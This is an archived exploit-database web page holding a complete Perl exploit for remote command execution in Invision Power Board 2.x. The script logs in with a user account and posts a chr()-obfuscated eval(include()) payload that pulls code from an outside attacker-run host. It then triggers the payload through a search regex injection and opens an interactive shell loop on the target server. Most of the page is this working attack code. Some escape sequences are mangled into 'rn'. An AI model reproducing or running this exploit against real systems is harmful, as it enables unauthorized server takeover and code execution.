|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  ExploitAlert Database |
||
ExploitAlert : 538 Credit : 1dt.w0lf Date : 27.04.2006 Exploit Code : #!/usr/bin/perl ## Invision Power Board 2.* commands execution exploit by RST/GHC ## vulnerable versions <= 2.1.5 ## tested on 2.1.4, 2.0.2 ## ## (c)oded by 1dt.w0lf ## RST/GHC ## http://rst.void.ru ## http://ghc.ru use IO::Socket; use Getopt::Std; getopts("l:h:p:d:f:v:"); $host = $opt_h; $dir = $opt_d; $login = $opt_l; $password = $opt_p; $forum = $opt_f; $version = $opt_v || 0; $|++; header(); if(!$host||!$dir||!$login||!$password||!$forum) { usage(); } print "[~] SERVER : $hostrn"; print "[~] PATH : $dirrn"; print "[~] LOGIN : $loginrn"; print "[~] PASSWORD : $passwordrn"; print "[~] TARGET : $version"; print (($version)?(' - IPB 2.1.*'):(' - IPB 2.0.*')); print "rn"; print "[~] Login ... "; $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED"; $login =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg; $password =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg; $post = 'UserName='.$login.'&PassWord='.$password; $loggedin = 0; print $sock "POST ${dir}index.php?act=Login&CODE=01 HTTP/1.1rn"; print $sock "Host: $hostrn"; print $sock "Connection: closern"; print $sock "Content-Type: application/x-www-form-urlencodedn"; print $sock "Content-length: ".length($post)."rnrn"; print $sock "$post"; print $sock "rnrn"; while (<$sock>) { if(/session_id=([a-f|0-9]{32})/) { $sid = $1; } } $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED"; print $sock "GET ${dir}index.php HTTP/1.1rn"; print $sock "Host: $hostrn"; print $sock "Cookie: session_id=$sid;rn"; print $sock "Connection: closernrn"; while (<$sock>) { if(/act=Login&CODE=03/) { $loggedin = 1; last; } } if($loggedin) { print " [ DONE ]rn"; } else { print " [ FAILED ]rn"; exit(); } print "[+] SID: $sidrn"; print "[~] Try get md5_check ..."; $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED"; if($version==1) { print $sock "GET ${dir}index.php?act=post&do=new_post&f=${forum} HTTP/1.1rn"; } else { print $sock "GET ${dir}index.php?act=Post&CODE=00&f=${forum} HTTP/1.1rn"; } print $sock "Host: $hostrn"; print $sock "Cookie: session_id=$sid;rn"; print $sock "Connection: closernrn"; while (<$sock>) { if($version == 1 && /ipb_md5_checks*= "([a-f|0-9]{32})"/) { $md5_check = $1; last; } if($version == 0 && /auth_key' value='([a-f|0-9]{32})/) { $md5_check = $1; last; } } close($sock); if($md5_check) { print " [ DONE ]rn"; print "[+] MD5_CHECK : $md5_checkrn"; } else { print " [ FAILED ]rn"; exit(); } print "[~] Create new message ..."; $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED"; $created = 0; $text = 'r57ipbxplhohohoeval(include(chr(104).chr(116).chr(116).chr(112).chr(58).ch r(47).chr(47).chr(114).chr(115).chr(116).chr(46).chr(118).chr(111).chr(105) .chr(100).chr(46).chr(114).chr(117).chr(47).chr(114).chr(53)'. '.chr(55).chr(105).chr(112).chr(98).chr(105).chr(110).chr(99).chr(46).chr(1 16).chr(120).chr(116))); //'; $post = "st=0&act=Post&s=&f=${forum}&auth_key=${md5_check}&removeattachid=0&CODE=01 &post_key=&TopicTitle=justxpl&TopicDesc=justxpl&poll_question=&ffont=0&fsiz e=0&Post=${text}&enableemo=yes&enablesig=yes&iconid=0"; print $sock "POST ${dir}index.php HTTP/1.1rn"; print $sock "Host: $hostrn"; print $sock "Cookie: session_id=$sid;rn"; print $sock "Connection: closern"; print $sock "Content-Type: application/x-www-form-urlencodedn"; print $sock "Content-length: ".length($post)."rnrn"; print $sock "$post"; print $sock "rnrn"; while (<$sock>) { if(/Location:/) { $created = 1; last; } } if($created) { print " [ DONE ]rn"; } else { print " [ FAILED ]rn"; exit(); } $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED"; print "[~] Search message ..."; $post = 'keywords=r57ipbxplhohohoeval&namesearch='.$login.'&forums%5B%5D=all&search subs=1&prune=0&prune_type=newer&sort_key=last_post&sort_order=desc&search_i n=posts&result_type=posts'; print $sock "POST ${dir}index.php?act=Search&CODE=01 HTTP/1.1rn"; print $sock "Host: $hostrn"; print $sock "Cookie: session_id=$sid;rn"; print $sock "Connection: closern"; print $sock "Content-Type: application/x-www-form-urlencodedn"; print $sock "Content-length: ".length($post)."rnrn"; print $sock "$post"; print $sock "rnrn"; while (<$sock>) { if(/searchid=([a-f|0-9]{32})/) { $searchid = $1; last; } } if($searchid) { print " [ DONE ]rn"; } else { print "[ FAILED ]rn"; exit(); } print "[+] SEARCHID: $searchidrn"; $get = 'index.php?act=Search&CODE=show&searchid='.$searchid.'&search_in=posts&resu lt_type=posts&highlite=r57ipbxplhohohoeval&lastdate=z|eval.*?%20//)%23e%00' ; while () { print "Command for execute or 'exit' for exit # "; while(<STDIN>) { $cmd=$_; chomp($cmd); exit() if ($cmd eq 'exit'); last; } &run($cmd); } sub run() { $cmd =~ s/(.*);$/$1/eg; $cmd =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg; $cmd2 = '%65%63%68%6F%20%5F%53%54%41%52%54%5F%20%26%26%20'; $cmd2 .= $cmd; $cmd2 .= '%20%26%26%20%65%63%68%6F%20%5F%45%4E%44%5F'; $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED"; print $sock "GET ${dir}${get}&eharniy_ekibastos=$cmd2 HTTP/1.1rn"; print $sock "Host: $hostrn"; print $sock "Cookie: session_id=$sid;rn"; print $sock "Connection: closernrn"; $on = 0; $runned = 0; while ($answer = <$sock>) { if ($answer =~ /^_END_/) { return 0; } if ($on == 1) { print " $answer"; } if ($answer =~ /^_START_/) { $on = 1; } } } sub header() { "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~rn"; print " Invision Power Board 2.* commands execution exploit by RST/GHCrn"; "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~rn"; } sub usage() { print "r57ipbce.pl -h <host> -d <dir> -l <login> -p <password> -f <forum> -v <version>rnrn"; print "<host> - host where IPB installed e.g www.ipb.comrn"; print "<dir> - folder where IPB installed e.g. /forum/ , /ipb/ , etc...rn"; print "<login> - login of any exist userrn"; print "<password> - and password too )rn"; print "<forum> - number of forum where user can create topic e.g 2,4, etcrn"; print "<version> - forum version:rn"; print " 0 - 2.0.*rn"; print " 1 - 2.1.*rn"; exit(); }  Feedback : If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com. |
||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |